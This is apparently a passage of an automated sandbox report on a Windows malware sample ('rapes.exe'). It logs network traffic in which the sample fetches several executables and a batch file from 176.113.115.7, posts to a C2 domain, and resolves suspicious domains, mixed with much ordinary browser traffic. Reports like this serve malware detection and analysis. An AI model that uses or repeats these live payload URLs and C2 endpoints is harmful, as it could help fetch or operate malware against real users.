                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_004405B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,28_2_004405B0
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiKo8sBCIWgzQEI59DNAQi91c4BCIDWzgEIvODOAQiu5M4BCIvlzgEY4eLOAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiKo8sBCIWgzQEI59DNAQi91c4BCIDWzgEIvODOAQiu5M4BCIvlzgEY4eLOAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiKo8sBCIWgzQEY4eLOAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                      Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                      Source: global trafficHTTP traffic detected: GET /files/7222648325/2qv26zF.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveHost: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /files/teamex_support/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://pixel.advertising.com/firefox-etp*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://*.adsafeprotected.com/services/pub**://*.adsafeprotected.com/jload?**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://*.adsafeprotected.com/*/Serving/**://www.facebook.com/platform/impression.php*color-mix(in srgb, currentColor 9%, transparent)resource://gre/modules/CrashMonitor.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://track.adform.net/serving/scripts/trackpoint/pictureinpicture%40mozilla.org:1.0.0*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*@mozilla.org/network/atomic-file-output-stream;1FileUtils_closeAtomicFileOutputStreamresource://gre/modules/FileUtils.sys.mjs@mozilla.org/addons/addon-manager-startup;1webcompat-reporter@mozilla.org.xpi*://www.google-analytics.com/gtm/js**://www.google-analytics.com/plugins/ua/ec.js*://www.google-analytics.com/analytics.js**://imasdk.googleapis.com/js/sdkloader/ima3.js*://static.adsafeprotected.com/iasPET.1.js*://ssl.google-analytics.com/ga.js*://www.googletagservices.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://www.googletagmanager.com/gtm.js**://adservex.media.net/videoAds.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s0.2mdn.net/instream/html5/ima3.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.js*://s.webtrends.com/js/advancedLinkTracking.jsresource://gre/modules/DeferredTask.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: devtools/client/framework/devtools@mozilla.org/dom/slow-script-debug;1Failed to listen. Callback argument missing.resource://devtools/shared/security/socket.jsDevToolsStartup.jsm:handleDebuggerFlagNo callback set for this channel.browser.fixup.dns_first_for_single_wordsreleaseDistinctSystemPrincipalLoaderdevtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.urlbar.dnsResolveFullyQualifiedNamesJSON Viewer's onSave failed in startPersistencedevtools.performance.popup.feature-flagFailed to listen. Listener already attached.Failed to execute WebChannel callback:@mozilla.org/network/protocol;1?name=file^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools/client/framework/devtools-browserdevtools.performance.recording.ui-base-url^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?@mozilla.org/network/protocol;1?name=defaultWebChannel/this._originCheckCallback@mozilla.org/uriloader/handler-service;1^([a-z+.-]+:\/{0,3})*([^\/@]+@).+resource://devtools/server/devtools-server.jsbrowser.fixup.domainsuffixwhitelist.Unable to start devtools server on get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPGot invalid request to save JSON dataget FIXUP_FLAGS_MAKE_ALTERNATE_URIDevTools telemetry entry point failed: resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/NetUtil.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://poczta.interia.pl/mh/?mailto=%sCan't invoke URIFixup in the content processresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<extractScheme/fixupChangedProtocol<_injectDefaultProtocolHandlersIfNeededisDownloadsImprovementsAlreadyMigratedresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/JSONFile.sys.mjsScheme should be either http or httpshandlerSvc fillHandlerInfo: don't know this typegecko.handlerService.defaultHandlersVersionhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/URIFixup.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjshttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sMust have a source and a callback@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStream@mozilla.org/network/input-stream-pump;1Non-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1https://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.prev
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: onPrefEnabledChanged() - removing gmp directory @mozilla.org/network/safe-file-output-stream;1resource://gre/modules/addons/XPIProvider.jsm*://www.everestjs.net/static/st.v3.js**://cdn.branch.io/branch-latest.min.js**://auth.9c9media.ca/auth/main.js*://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter%40mozilla.org:1.5.1*://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat.jsFileUtils_openSafeFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://static.criteo.net/js/ld/publishertag.jshttps://smartblock.firefox.etp/play.svg*://*.imgur.com/js/vendor.*.bundle.js*://*.imgur.io/js/vendor.*.bundle.js@mozilla.org/network/file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js*FileUtils_openAtomicFileOutputStreamFileUtils_closeSafeFileOutputStreamresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: defaulemot.run
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: play.google.com
                      Source: global trafficDNS traffic detected: DNS query: youtube.com
                      Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                      Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                      Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                      Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: shavar.prod.mozaws.net
                      Source: global trafficDNS traffic detected: DNS query: example.org
                      Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                      Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                      Source: global trafficDNS traffic detected: DNS query: www.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
                      Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
                      Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
                      Source: global trafficDNS traffic detected: DNS query: www.reddit.com
                      Source: global trafficDNS traffic detected: DNS query: twitter.com
                      Source: global trafficDNS traffic detected: DNS query: reddit.map.fastly.net
                      Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: begindecafer.world
                      Source: global trafficDNS traffic detected: DNS query: support.mozilla.org
                      Source: global trafficDNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
                      Source: unknownHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: defaulemot.run
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025642E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                      Source: 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7222648325/2qv26zF.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7222648325/2qv26zF.exen
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7222648325/2qv26zF.exeswsock.dll
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe0
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/teamex_support/random.exec97d7u
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/luma/random.exec8
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/luma/random.exeh8
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D819CA000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
